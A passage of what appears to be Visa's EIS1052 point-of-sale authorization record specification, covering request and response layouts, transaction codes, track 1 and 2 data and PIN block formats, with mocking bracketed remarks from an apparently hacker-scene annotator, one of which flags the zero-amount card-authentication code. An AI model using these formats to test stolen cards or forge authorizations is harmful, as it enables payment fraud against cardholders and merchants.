|||
|
Data Capture Record Formats
|
|||
|
|
|||
|
2. EIS1052 - External Interface Specification
|
|||
|
Second Generation
|
|||
|
Data Capture Link Level Protocol
|
|||
|
|
|||
|
3.0 AUTHORIZATION RECORD FORMATS
|
|||
|
|
|||
|
This section contains the record formats for the authorization request,
|
|||
|
response and confirmation records. The ANSI X3.4 character set is used to
|
|||
|
represent all record data elements. (See Section 7)
|
|||
|
|
|||
|
In the record formats on the following pages, the column heading FORMAT is
|
|||
|
defined as:
|
|||
|
|
|||
|
"NUM" represents numeric data, the numbers 0 through 9, NO SPACES.
|
|||
|
"A/N" represents alphanumeric data, the printing character set.
|
|||
|
"FS" represents a field separator character as defined in ANSI X3.4 as
|
|||
|
a "1C" hex
|
|||
|
|
|||
|
3.01 REQUEST RECORD FORMAT
|
|||
|
|
|||
|
Table 3.01b provides the record format for the authorization request records.
|
|||
|
Section 4 provides the data element definitions.
|
|||
|
|
|||
|
The authorization request record is a variable length record. The record
|
|||
|
length will depend on the source of the customer data and the type of
|
|||
|
authorization request. Refer to Table 3.01c to determine which GROUPS to use
|
|||
|
from Table 3.01a
|
|||
|
|
|||
|
TABLE 3.01a IS PROVIDED FOR REFERENCE REASONS ONLY. ALL NEW APPLICATIONS
|
|||
|
SHOULD USE ONE OF THE FOLLOWING RECORD FORMATS:
|
|||
|
|
|||
|
RECORD | APPLICATION |
|
|||
|
FORMAT | TYPE | REMARKS
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
J | CREDIT | All non-ATM card transactions (Visa cards, other credit
|
|||
|
| | cards, private label credit cards and check guarantee)
|
|||
|
G | DIAL DEBIT | Visa supported ATM debit cards
|
|||
|
|
|||
|
The selection of format type J and G or any other value from Table 3.01a will
|
|||
|
depend on the VisaNet services that are desired. Contact your Visa POS member
|
|||
|
support representative for assistance in determining the required formats.
|
|||
|
|
|||
|
TABLE 3.01a
|
|||
|
Record Format Summary
|
|||
|
|
|||
|
Non-CVV CVV Terminal
|
|||
|
Compliant Compliant Generation Description
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
0 RESERVED
|
|||
|
1 N First Vutran
|
|||
|
2 8 First Sweda
|
|||
|
4 R First Verifone
|
|||
|
6 P First Amex
|
|||
|
7 3 First Racal
|
|||
|
A Q First DMC
|
|||
|
B R First GTE & Omron [velly intelestink]
|
|||
|
C 9 First Taltek
|
|||
|
S U First Datatrol - Standard Oil
|
|||
|
D T First Datatrol
|
|||
|
E RESERVED
|
|||
|
5 F Second Non-REPS-Phase 1 CVV
|
|||
|
G Second Dial Debit
|
|||
|
H Second Non-REPS-Phase 2 CVV
|
|||
|
I Second RESERVED - Non-REPS Controller
|
|||
|
J Second REPS - Terminal & Controller
|
|||
|
K Second RESERVED
|
|||
|
L Second RESERVED - Leased VAP
|
|||
|
M Second RESERVED - Member Format
|
|||
|
N-O RESERVED
|
|||
|
V-Y RESERVED
|
|||
|
Z Second RESERVED - SDLC Direct [hmmm]
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
TABLE 3.01b
|
|||
|
Second Generation Authorization Request Record Format
|
|||
|
|
|||
|
see
|
|||
|
Group Byte# Length Format Name section
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
1 1 A/N Record Format 4.01
|
|||
|
2 1 A/N Application Type 4.02
|
|||
|
3 1 A/N Message Delimiter 4.03
|
|||
|
4-9 6 NUM Acquirer Bin 4.04
|
|||
|
10-21 12 NUM Merchant Number 4.05
|
|||
|
22-25 4 NUM Store Number 4.06
|
|||
|
26-29 4 NUM Terminal Number 4.07
|
|||
|
30-33 4 NUM Merchant Category Code 4.08
|
|||
|
34-36 3 NUM Merchant Country Code 4.09
|
|||
|
37-41 5 A/N Merchant City Code (ZIP in the U.S.) 4.10
|
|||
|
42-44 3 NUM Time Zone Differential 4.11
|
|||
|
45-46 2 A/N Authorization Transaction Code 4.12
|
|||
|
47-54 8 NUM Terminal Identification Number 4.13
|
|||
|
55 1 A/N Payment Service Indicator 4.14
|
|||
|
56-59 4 NUM Transaction Sequence Number 4.15
|
|||
|
60 1 A/N Cardholder Identification Code 4.16
|
|||
|
61 1 A/N Account Data Field 4.17
|
|||
|
Variable 1-76 Customer Data Field 4.18.x
|
|||
|
(See: DEFINITIONS in Table 3.01d)
|
|||
|
Variable 1 "FS" Field Separator 4.19
|
|||
|
Variable 0-32 A/N Cardholder Identification Data 4.20
|
|||
|
Variable 1 "FS" Field Separator 4.21
|
|||
|
Variable 3-12 NUM Transaction Amount 4.22
|
|||
|
Variable 1 "FS" Field Separator 4.23
|
|||
|
Variable 2 A/N Device Code/Industry Code 4.24
|
|||
|
Variable 1 "FS" Field Separator 4.25
|
|||
|
Variable 0-6 NUM Issuing/Receiving Institution ID 4.26
|
|||
|
I Variable 1 "FS" Field Separator 4.27
|
|||
|
Variable 3-12 NUM Secondary Amount (Cashback) 4.28
|
|||
|
II Variable 1 "FS" Field Separator 4.29
|
|||
|
Variable 25 A/N Merchant Name 4.30
|
|||
|
Variable 13 A/N Merchant City 4.31
|
|||
|
Variable 2 A/N Merchant State 4.33
|
|||
|
Variable 1-14 A/N Sharing Group 4.33
|
|||
|
Variable 1 "FS" Field Separator 4.34
|
|||
|
Variable 0-12 NUM Merchant ABA 4.35
|
|||
|
Variable 0-4 NUM Merchant Settlement Agent Number 4.36
|
|||
|
Variable 1 "FS" Field Separator 4.37
|
|||
|
Variable 6 NUM Agent Number 4.38
|
|||
|
Variable 6 NUM Chain Number 4.39
|
|||
|
Variable 3 NUM Batch Number 4.40
|
|||
|
Variable 1 A/N Reimbursement Attribute 4.41
|
|||
|
III Variable 1 "FS" Field Separator 4.42
|
|||
|
Variable 6 A/N Approval Code 4.43
|
|||
|
Variable 4 NUM Settlement Date (MMDD) 4.44
|
|||
|
Variable 4 NUM Local Transaction Date (MMDD) 4.45
|
|||
|
Variable 6 NUM Local Transaction Time (HHMMSS) 4.46
|
|||
|
Variable 6 A/N System Trace Audit Number 4.47
|
|||
|
Variable 2 A/N Original Auth. Transaction Code 4.48
|
|||
|
Variable 1 A/N Network Identification Code 4.49
|
|||
|
IV Variable 1 "FS" Field Separator 4.50
|
|||
|
|
|||
|
NOTE: The maximum length request can be as long as 290 bytes for an Interlink
|
|||
|
Debit Cancel request (including the STX/ETX/LRC). Since some terminals may be
|
|||
|
limited to a 256 byte message buffer, the following tips can save up to 36
|
|||
|
bytes:
|
|||
|
|
|||
|
- Limit fields 4.22 and 4.28 to 7 digits
|
|||
|
- Fields 4.26, 4.35 and 4.36 are not required for a debit request
|
|||
|
- Field 4.33 can be limited to 10 bytes
|
|||
|
|
|||
|
TABLE 3.01C
|
|||
|
Legend for GROUP (from Table 3.01b)
|
|||
|
|
|||
|
FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS RECORD
|
|||
|
I II III IV FORMAT
|
|||
|
|
|||
|
Check guarantee X J
|
|||
|
|
|||
|
Non-ATM card transactions (Visa cards, other X X J
|
|||
|
credit cards, private label credit cards
|
|||
|
|
|||
|
Visa supported ATM debit cards: Purchase, Return X X X G
|
|||
|
and Inquiry Request
|
|||
|
|
|||
|
Visa supported ATM debit cards: Interlink Cancel X X X X G
|
|||
|
Request
|
|||
|
|
|||
|
TABLE 3.01d
|
|||
|
Definitions for Customer Data Field (from Table 3.01b)
|
|||
|
|
|||
|
Length Format Field Name See
|
|||
|
Section
|
|||
|
MAGNETICALLY read credit cards (SELECT ONE):
|
|||
|
up to 76 A/N Track 1 Read Data 4.18.1
|
|||
|
up to 37 NUM Track 2 Read Data 4.18.2
|
|||
|
|
|||
|
MANUALLY entered credit cards:
|
|||
|
up to 28 NUM Manually Entered Account Number 4.18.3.1
|
|||
|
1 "FS" Field Separator
|
|||
|
4 NUM Manually Entered Expiration Date (MMYY) 4.18.3.2
|
|||
|
|
|||
|
MACHINE read and MANUALLY entered check acceptance requests:
|
|||
|
1 to 28 A/N Check Acceptance ID 4.18.4.1
|
|||
|
1 "FS" Field Separator 4.18.4.2
|
|||
|
3 to 6 A/N Manually Entered Check Acceptance Data 4.18.4.2
|
|||
|
|
|||
|
MAGNETICALLY read ATM debit cards:
|
|||
|
up to 37 NUM Track 2 Read Data 4.18.2
|
|||
|
|
|||
|
3.02 RESPONSE RECORD FORMAT
|
|||
|
|
|||
|
Table 3.02a provides the record format for the authorization response records.
|
|||
|
Section 5 provides the data element definitions.
|
|||
|
|
|||
|
The authorization response record is variable length for record formats "J" &
|
|||
|
"G". Refer to Table 3.02b to determine which GROUPS to use from Table 3.02a.
|
|||
|
|
|||
|
Table 3.02a
|
|||
|
Second Generation Authorization Response Record
|
|||
|
see
|
|||
|
Group Byte# Length Format Name section
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
1 1 A/N Payment Service Indicator 5.01
|
|||
|
2-5 4 NUM Store Number 5.02
|
|||
|
6-9 4 NUM Terminal Number 5.03
|
|||
|
10 1 A/N Authorization Source Code 5.04
|
|||
|
11-14 4 NUM Transaction Sequence Number 5.05
|
|||
|
15-16 2 A/N Response Code 5.06
|
|||
|
17-22 6 A/N Approval Code 5.07
|
|||
|
23-28 6 NUM Local Transaction Date (MMDDYY) 5.08
|
|||
|
29-44 16 A/N Authorization Response Message 5.09
|
|||
|
45 1 A/N AVS Result Code 5.10
|
|||
|
Variable 0/15 NUM Transaction Identifier 5.11
|
|||
|
Variable 1 "FS" Field Separator 5.12
|
|||
|
Variable 0/4 A/N Validation Code 5.13
|
|||
|
I Variable 1 "FS" Field Separator 5.14
|
|||
|
Variable 1 A/N Network Identification Code 5.15
|
|||
|
Variable 4 NUM Settlement Date (MMDD) 5.16
|
|||
|
Variable 6 A/N System Trace Audit Number 5.17
|
|||
|
Variable 12 A/N Retrieval Reference Number 5.18
|
|||
|
II Variable 6 NUM Local Transaction Time (HHMMSS) 5.19
|
|||
|
|
|||
|
Table 3.02b
|
|||
|
Legend for GROUP (from Table 3.02a)
|
|||
|
|
|||
|
FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS RECORD
|
|||
|
I II FORMAT
|
|||
|
|
|||
|
All non-ATM card transactions (Visa cards, other credit X J
|
|||
|
cards, private label credit cards and check guarantee)
|
|||
|
|
|||
|
Visa supported ATM debit cards: Purchase, Return, Inquiry X X G
|
|||
|
Request and Interlink Cancel Request
|
|||
|
|
|||
|
3.03 CONFIRMATION RECORD FORMAT (ATM DEBIT ONLY)
|
|||
|
|
|||
|
Table 3.03 provides the record format for the second generation debit response
|
|||
|
confirmation record. Section 6 provides the data element definitions.
|
|||
|
|
|||
|
The debit response confirmation record is a fixed length record.
|
|||
|
|
|||
|
TABLE 3.03
|
|||
|
Second Generation Debit Response Confirmation Record
|
|||
|
|
|||
|
see
|
|||
|
Group Byte# Length Format Name section
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
1 1 A/N Network ID Code 6.01
|
|||
|
2-5 4 NUM Settlement Date (MMDD) 6.02
|
|||
|
I 6-11 6 A/N System Trace Audit Number 6.03
|
|||
|
|
|||
|
4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS
|
|||
|
|
|||
|
The following subsections will define the authorization request record data
|
|||
|
elements.
|
|||
|
|
|||
|
4.01 RECORD FORMAT
|
|||
|
|
|||
|
There are several message formats defined within the VisaNet systems. The
|
|||
|
second generation authorization format is specified by placing one of the
|
|||
|
defined values in the record format field. Table 4.01 provides a brief summary
|
|||
|
of the current formats.
|
|||
|
|
|||
|
TABLE 4.01
|
|||
|
VisaNet Authorization Record Format Designators
|
|||
|
|
|||
|
RECORD FORMAT RECORD DESCRIPTION
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
J All non-ATM card transactions (Visa cards, other credit
|
|||
|
cards, private label credit cards and check guarantee)
|
|||
|
G Visa supported ATM debit cards
|
|||
|
|
|||
|
4.02 APPLICATION TYPE
|
|||
|
|
|||
|
The VisaNet authorization system supports multiple application types ranging
|
|||
|
from single thread first generation authorization to interleaved leased line
|
|||
|
authorization processing. Table 4.02 provides a summary of application type.
|
|||
|
|
|||
|
TABLE 4.02
|
|||
|
VisaNet Application Designators
|
|||
|
|
|||
|
APPLICATION USE WITH
|
|||
|
TYPE APPLICATION DESCRIPTION REC. FMT.
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
0 Single authorization per connection J and G
|
|||
|
2 Multiple authorizations per connection J and G
|
|||
|
single-threaded
|
|||
|
4 Multiple authorizations per connect, J
|
|||
|
interleaved
|
|||
|
6 Reserved for future use ---
|
|||
|
8 Reserved for future use ---
|
|||
|
1,3,5,7 Reserved for VisaNet Central Data Capture (CDC) ---
|
|||
|
9 Reserved for VisaNet Down Line Load ---
|
|||
|
A-Z Reserved for future use ---
|
|||
|
|
|||
|
4.03 MESSAGE DELIMITER
|
|||
|
|
|||
|
The message delimiter separates the format and application type designators from
|
|||
|
the body of the message. The message delimiter is defined as a "." (period)
|
|||
|
|
|||
|
4.04 ACQUIRER BIN
|
|||
|
|
|||
|
This field contains the Visa assigned six-digit Bank Identification Number (BIN)
|
|||
|
The acquirer BIN identifies the merchant signing member that signed the merchant
|
|||
|
using the terminal.
|
|||
|
|
|||
|
NOTE: The merchant receives this number from their signing member.
|
|||
|
|
|||
|
4.05 MERCHANT NUMBER
|
|||
|
|
|||
|
This field contains a NON-ZERO twelve digit number, assigned by the signing
|
|||
|
member and/or the merchant, to identify the merchant within the member systems.
|
|||
|
The combined Acquirer BIN and Merchant Number are required to identify the
|
|||
|
merchant within the VisaNet systems.
|
|||
|
|
|||
|
4.06 STORE NUMBER
|
|||
|
|
|||
|
This field contains a NON-ZERO four-digit number assigned by the signing member
|
|||
|
and/or the merchant to identify the merchant store within the member systems.
|
|||
|
The combined Acquirer BIN, Merchant Number, and Store Number are required to
|
|||
|
identify the store within the VisaNet systems.
|
|||
|
|
|||
|
4.07 TERMINAL NUMBER
|
|||
|
|
|||
|
This field contains a NON-ZERO four-digit number assigned by the signing member
|
|||
|
and/or the merchant to identify the merchant store within the member systems.
|
|||
|
This field can be used by systems which use controllers and/or concentrators to
|
|||
|
identify the devices attached to the controllers and/or concentrators.
|
|||
|
|
|||
|
4.08 MERCHANT CATEGORY CODE
|
|||
|
|
|||
|
This field contains a four-digit number assigned by the signing member from a
|
|||
|
list of category codes defined in the VisaNet Merchant Data Standards Handbook
|
|||
|
to identify the merchant type.
|
|||
|
|
|||
|
4.09 MERCHANT COUNTRY CODE
|
|||
|
|
|||
|
This field contains a three-digit number assigned by the signing member from a
|
|||
|
list of country codes defined in the VisaNet V.I.P. System Message Format
|
|||
|
Manuals to identify the merchant location country.
|
|||
|
|
|||
|
4.10 MERCHANT CITY CODE
|
|||
|
|
|||
|
This field contains a five character code used to further identify the merchant
|
|||
|
location. Within the United States, the give high order zip code digits of the
|
|||
|
address of the store location are used. Outside of the United States, this
|
|||
|
field will be assigned by the signing member.
|
|||
|
|
|||
|
4.11 TIME ZONE DIFFERENTIAL
|
|||
|
|
|||
|
This field contains a three-digit code used to calculate the local time within
|
|||
|
the VisaNet authorization system. It is calculated by the signing member,
|
|||
|
providing the local time zone differential from Greenwich Mean Time (GMT). The
|
|||
|
first two digits specify the magnitude of the differential. Table 4.11 provides
|
|||
|
a brief summary of the Time Zone Differential codes.
|
|||
|
|
|||
|
TABLE 4.11
|
|||
|
Time Zone Differential Code Format
|
|||
|
|
|||
|
Byte # Length Format Contents
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
1 1 NUMERIC DIRECTION
|
|||
|
0 = Positive, Local Ahead of GMT,
|
|||
|
offset in hours
|
|||
|
1 = Negative, Local Time behind GMT,
|
|||
|
offset in hours
|
|||
|
2 = Positive, offset in 15 minute
|
|||
|
increments
|
|||
|
3 = Negative, offset in 15 minute
|
|||
|
increments
|
|||
|
4 = Positive, offset in 15 minute
|
|||
|
increments, participating in
|
|||
|
daylight savings time
|
|||
|
5 = Negative, offset in 15 minute
|
|||
|
increments, participating in
|
|||
|
daylight savings time
|
|||
|
6-9 = INVALID CODES
|
|||
|
2-3 2 NUMERIC MAGNITUDE
|
|||
|
For Byte #1 = 0 or 1
|
|||
|
0 <= MAGNITUDE <= 12
|
|||
|
For Byte #1 = 2 through 5
|
|||
|
0 <= MAGNITUDE <= 48
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
A code of 108 indicates the local Pacific Standard time which is 8 hours behind
|
|||
|
GMT.
|
|||
|
|
|||
|
4.12 AUTHORIZATION TRANSACTION CODE
|
|||
|
|
|||
|
This field contains a two-character code defined by VisaNet and generated by the
|
|||
|
terminal identifying the type of transaction for which the authorization is
|
|||
|
requested. Table 4.12 provides a summary of the transaction codes.
|
|||
|
|
|||
|
TABLE 4.12
|
|||
|
Authorization Transaction Codes
|
|||
|
|
|||
|
TRAN
|
|||
|
CODE TRANSACTION DESCRIPTION
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
54 Purchase
|
|||
|
55 Cash Advance
|
|||
|
56 Mail/Telephone Order
|
|||
|
57 Quasi Cash
|
|||
|
58 Card Authentication - Transaction Amt & Secondary Amt must equal
|
|||
|
$0.00, AVS may be requested [ah-hah!]
|
|||
|
64 Repeat: Purchase
|
|||
|
65 Repeat: Cash Advance
|
|||
|
66 Repeat: Mail/Telephone Order (MO/TO)
|
|||
|
67 Repeat: Quasi Cash
|
|||
|
68 Repeat: Card Authentication - Transaction Amt & Secondary Amt must
|
|||
|
equal $0.00, AVS may be requested
|
|||
|
70 Check guarantee, must include RIID (field 4.26)
|
|||
|
81 Proprietary Card
|
|||
|
84 Private Label Purchase
|
|||
|
85 Private Label, Cash Advance
|
|||
|
86 Private Label Mail/Telephone Order (MO/TO)
|
|||
|
87 Private Label Quasi Cash
|
|||
|
88 Private Label Card Authentication - Transaction Amt & Secondary Amt
|
|||
|
must equal $0.00, AVS may be requested
|
|||
|
93 Debit Purchase
|
|||
|
94 Debit Return
|
|||
|
95 Interlink Debit Cancel (see NOTE below)
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
|
|||
|
NOTE (for TRANSACTION CODE = 95)
|
|||
|
--------------------------------
|
|||
|
- For Interlink Debit CANCEL request message, all of the fields in
|
|||
|
Groups I and II will come from the original transaction request or the
|
|||
|
original transaction response, with the exception of the following:
|
|||
|
- The AUTHORIZATION TRANSACTION CODE will need to be changed to the
|
|||
|
Debit CANCEL code.
|
|||
|
- The TRANSACTION SEQUENCE NUMBER should be incremented in the
|
|||
|
normal fashion.
|
|||
|
- The CUSTOMER DATA FIELD and the CARDHOLDER IDENTIFICATION DATE
|
|||
|
(PIN) will need to be re-entered.
|
|||
|
|
|||
|
4.13 TERMINAL IDENTIFICATION NUMBER
|
|||
|
|
|||
|
This field contains an eight-digit code that must be greater than zero, defined
|
|||
|
by the terminal down line load support organization. Support may be provided by
|
|||
|
the Visa's Merchant Assistance Center (MAC), the signing member, or a third
|
|||
|
party organization. The terminal ID is used to uniquely identify the terminal
|
|||
|
in the terminal support system and identification for the VisaNet Central Data
|
|||
|
Capture (CDC). The terminal ID may not be unique within the VisaNet system.
|
|||
|
Each terminal support provider and member that provides its own terminal support
|
|||
|
can assign potentially identical terminal IDs within its system. The terminal
|
|||
|
ID can be used by the terminal down line load system to access the terminal
|
|||
|
application and parameter data from a system data base when down line loading a
|
|||
|
terminal. [huh?]
|
|||
|
|
|||
|
NOTE: It is recommended that [the] Terminal ID Number should be unique within
|
|||
|
the same Acquirer's BIN.
|
|||
|
|
|||
|
4.14 PAYMENT SERVICE INDICATOR
|
|||
|
|
|||
|
This is a one-character field used to indicate a request for REPS qualification.
|
|||
|
Table 4.14 provides a summary of the codes.
|
|||
|
|
|||
|
TABLE 4.14
|
|||
|
Payment Service Indicator Codes
|
|||
|
|
|||
|
RECORD
|
|||
|
FORMAT VALUE DESCRIPTION
|
|||
|
------------------------------
|
|||
|
J Y Yes
|
|||
|
J N No
|
|||
|
G Y Yes
|
|||
|
G N No
|
|||
|
------------------------------ [repetitive? you bet]
|
|||
|
|
|||
|
4.15 TRANSACTION SEQUENCE NUMBER
|
|||
|
|
|||
|
This field contains a four-digit code which is generated by the terminal as the
|
|||
|
sequence number for the transaction. The sequence number is used by the
|
|||
|
terminal to match request and response messages. This field is returned by
|
|||
|
VisaNet without sequence verification. The sequence number is incremented with
|
|||
|
wrap from 9999 to 0001.
|
|||
|
|
|||
|
4.16 CARDHOLDER IDENTIFICATION CODE
|
|||
|
|
|||
|
This one-character field contains a code that indicates the method used to
|
|||
|
identify the cardholder. Table 4.16 provides a summary of the codes.
|
|||
|
|
|||
|
TABLE 4.16
|
|||
|
Cardholder Identification Codes
|
|||
|
|
|||
|
ID CODE IDENTIFICATION METHOD
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
A Personal Identification Number-23 byte static key (non-USA) fnord
|
|||
|
B PIN at Automated Dispensing Machine - 32 byte static key
|
|||
|
C Self Svc Limited Amount Terminal (No ID method available)
|
|||
|
D Self-Service Terminal (No ID method available)
|
|||
|
E Automated Gas Pump (No ID method available)
|
|||
|
K Personal Identification Number - 32 byte DUK/PT
|
|||
|
N Customer Address via Address Verification Service (AVS)
|
|||
|
S Personal Identification Number - 32 byte static key
|
|||
|
Z Cardholder Signature - Terminal has a PIN pad
|
|||
|
@ Cardholder Signature - No PIN pad available
|
|||
|
F-J,L,M,O-R Reserved for future use
|
|||
|
T-Y
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
|
|||
|
4.17 ACCOUNT DATA SOURCE
|
|||
|
|
|||
|
This field contains a one-character code defined by Visa and generated by the
|
|||
|
terminal to indicate the source of the customer data entered in field 4.18.
|
|||
|
Table 4.17 provides a summary of codes
|
|||
|
|
|||
|
TABLE 4.17
|
|||
|
Account Data Source Codes
|
|||
|
|
|||
|
ACCOUNT DATA
|
|||
|
SOURCE CODE ACCOUNT DATA SOURCE CODE DESCRIPTION
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
A RESERVED - Bar-code read
|
|||
|
B RESERVED - OCR read
|
|||
|
D Mag-stripe read, Track 2
|
|||
|
H Mag-stripe read, Track 1
|
|||
|
Q RESERVED - Manually keyed, bar-code capable terminal
|
|||
|
R RESERVED - Manually keyed, OCR capable terminal
|
|||
|
T Manually keyed, Track 2 capable
|
|||
|
X Manually keyed, Track 1 capable
|
|||
|
@ Manually keyed, terminal has no card reading capability
|
|||
|
C,E-G,I-P,S, RESERVED for future use
|
|||
|
U-W,Y-Z,0-9
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
NOTE:
|
|||
|
- If a dual track reading terminal is being used, be sure to enter the
|
|||
|
correct value of "D" or "H" for the magnetic data that is transmitted
|
|||
|
- When data is manually keyed at a dual track reading terminal, enter either
|
|||
|
a "T" or an "X"
|
|||
|
|
|||
|
4.18 CUSTOMER DATA FIELD
|
|||
|
|
|||
|
This is a variable length field containing customer account or check acceptance
|
|||
|
ID data in one of three formats. The cardholder account information can be read
|
|||
|
d from the card or it may be entered manually. Additionally the terminal can be
|
|||
|
used for check authorization processing with the check acceptance identification
|
|||
|
number entered by the operator for transmission in this field.
|
|||
|
|
|||
|
NOTE: For all POS terminals operated under VISA U.S.A. Operating Regulations,
|
|||
|
the following requirement must be available as an operating option if the
|
|||
|
merchant location is found to be generating a disproportionately high percentage
|
|||
|
of Suspect Transactions [lets get downright hostile about it] as defined in
|
|||
|
chapter 9.10 of the VISA U.S.A. Operating Regulations. Specifically, chapter
|
|||
|
9.10.B.2 requires that:
|
|||
|
|
|||
|
- The terminal must read the track data using a magnetic stripe reading
|
|||
|
terminal
|
|||
|
- The terminal must prompt the wage slave to manually enter the last four
|
|||
|
digits of the account number
|
|||
|
- The terminal must compare the keyed data with the last four digits of the
|
|||
|
account number in the magnetic stripe
|
|||
|
- If the compare is successful, the card is acceptable to continue in the
|
|||
|
authorization process and the terminal must transmit the full, unaltered
|
|||
|
contents of the magnetic stripe in the authorization message.
|
|||
|
- If the compare fails, the card should not be honored at the Point of Sale
|
|||
|
|
|||
|
4.18.1 TRACK 1 READ DATA
|
|||
|
|
|||
|
This is a variable length field with a maximum data length of 76 characters.
|
|||
|
|
|||
|
The track 1 data read from the cardholder's card is checked for parity and LRC
|
|||
|
errors and then converted from the six-bit characters encoded on the card to
|
|||
|
seven-bit characters as defined in ANSI X3.4. The character set definitions are
|
|||
|
provided in section 7 for reference. As part of the conversion the terminal
|
|||
|
will strip off the starting sentinel, ending sentinel, and LRC characters. The
|
|||
|
separators are to be converted to a "^" (HEX 5E) character. The entire
|
|||
|
track must be provided in the request message. The character set and data
|
|||
|
content are different between track 1 and track 2. The data read by a track 2
|
|||
|
device can not be correctly reformatted and presented as though it were read by
|
|||
|
a track 1 device. [aw shucks] The converted data can not be modified by adding
|
|||
|
or deleting non-framing characters and must be a one-for-one representation of
|
|||
|
the character read from the track.
|
|||
|
|
|||
|
4.18.2 TRACK 2 READ DATA
|
|||
|
|
|||
|
This is a variable length field with a maximum data length of 37 characters.
|
|||
|
|
|||
|
The track 2 data read from the cardholder's card is checked for parity and LRC
|
|||
|
errors and then converted from the six-bit characters encoded on the card to
|
|||
|
seven-bit characters as defined in ANSI X3.4. The character set definitions are
|
|||
|
provided in section 7 for reference. As part of the conversion the terminal
|
|||
|
will strip off the starting sentinel, ending sentinel, and LRC characters. The
|
|||
|
separators are to be converted to a "^" (HEX 5E) character. The entire
|
|||
|
track must be provided in the request message. The character set and data
|
|||
|
content are different between track 2 and track 1. The data read by a track 1
|
|||
|
device can not be correctly reformatted and presented as though it were read by
|
|||
|
a track 2 device. The converted data can not be modified by adding or deleting
|
|||
|
non-framing characters and must be a one-for-one representation of the character
|
|||
|
read from the track. [repetitive? you bet]
|
|||
|
|
|||
|
4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD)
|
|||
|
|
|||
|
The customer credit card data may be key entered when the card can not be read,
|
|||
|
when a card is not present, or when a card reader is not available.
|
|||
|
|
|||
|
4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER
|
|||
|
|
|||
|
This is a variable length field consisting of 5 to 28 alphanumeric characters.
|
|||
|
|
|||
|
The embossed cardholder data, that is key entered, is validated by the terminal
|
|||
|
using rules for each supported card type. For example, both Visa and Master
|
|||
|
Card include a mod 10 check digit as the last digit of the Primary Account
|
|||
|
Number. The Primary Account Number (PAN) is encoded as seven-bit characters
|
|||
|
as defined in ANSI X3.4. The PAN is then provided in the manually entered
|
|||
|
record format provided in Table 3.01b. The PAN must be provided without
|
|||
|
embedded spaces.
|
|||
|
|
|||
|
4.18.3.2 MANUALLY ENTERED EXPIRATION DATE
|
|||
|
|
|||
|
This four-digit field contains the card expiration date in the form MMYY (month-
|
|||
|
month-year-year)
|
|||
|
|
|||
|
4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER
|
|||
|
|
|||
|
The customer data may be card read or manually key entered for check acceptance
|
|||
|
transactions.
|
|||
|
|
|||
|
4.18.4.1 CHECK ACCEPTANCE ID
|
|||
|
|
|||
|
This field is a variable length field consisting of 1 to 28 alphanumeric
|
|||
|
characters. The check acceptance vendor will provide the data format and
|
|||
|
validation rules to be used by the terminal. Typically the ID consists of a
|
|||
|
two-digit state code and an ID which may be the customer's drivers license
|
|||
|
number.
|
|||
|
|
|||
|
4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA
|
|||
|
|
|||
|
This six-character field contains the customer birth date or a control code in
|
|||
|
the form specified by the check acceptance processor.
|
|||
|
|
|||
|
4.19 FIELD SEPARATOR
|
|||
|
|
|||
|
The authorization record format specifies the use of the "FS" character.
|
|||
|
|
|||
|
4.20 CARDHOLDER IDENTIFICATION DATA
|
|||
|
|
|||
|
This field will be 0, 23, 29 or 32 characters in length. The cardholder ID
|
|||
|
codes shown in Table 4.16 indicates the type of data in this field. Table
|
|||
|
4.20 provides a brief summary of the current formats.
|
|||
|
|
|||
|
TABLE 4.20
|
|||
|
Cardholder Identification Data Definitions
|
|||
|
|
|||
|
CARDHOLDER VALUE(S) FROM
|
|||
|
ID LENGTH DESCRIPTION TABLE 4.16
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
0 Signature ID used, No PIN pad is present @,C,D or E
|
|||
|
0 Signature ID used on a terminal with a PIN pad Z
|
|||
|
23 A PIN was entered on a STATIC key PIN pad A
|
|||
|
32 A PIN was entered on a STATIC key PIN pad B
|
|||
|
32 A PIN was entered on a DUK/PT key PIN pad K
|
|||
|
32 A PIN was entered on a STATIC key PIN pad S
|
|||
|
0 to 29 AVS was requested N
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
|
|||
|
4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID
|
|||
|
|
|||
|
NOTE: The 23 byte static key technology is NOT approved for use in terminals
|
|||
|
deployed in the Visa U.S.A. region. [thanks nsa!]
|
|||
|
|
|||
|
When a PIN is entered on a PIN pad supporting 23 byte static key technology, the
|
|||
|
terminal will generate the following data:
|
|||
|
|
|||
|
1JFxxyyaaaaaaaaaaaaaaaa
|
|||
|
|
|||
|
Where:
|
|||
|
1J Header - PIN was entered
|
|||
|
|
|||
|
f Function Key Indicator - A single byte indicating which, if any,
|
|||
|
function key was pressed on the PIN pad. This field is currently
|
|||
|
not edited. Any printable character is allowed.
|
|||
|
|
|||
|
xx PIN Block Format - These two numeric bytes indicate the PIN
|
|||
|
encryption method used to create the encrypted PIN block. Visa
|
|||
|
currently supports four methods; 01, 02, 03, & 04. For more
|
|||
|
information, please refer to the VisaNet Standards Manual, Card
|
|||
|
Technology Standards, PIN and Security Standards, Section 2,
|
|||
|
Chapter 3, PIN Block Formats
|
|||
|
|
|||
|
aaaaaaaaaaaaaaaa Expanded Encrypted PIN Block Data - The encrypted
|
|||
|
PIN block format consists of 64 bits of data. Since the VisaNet
|
|||
|
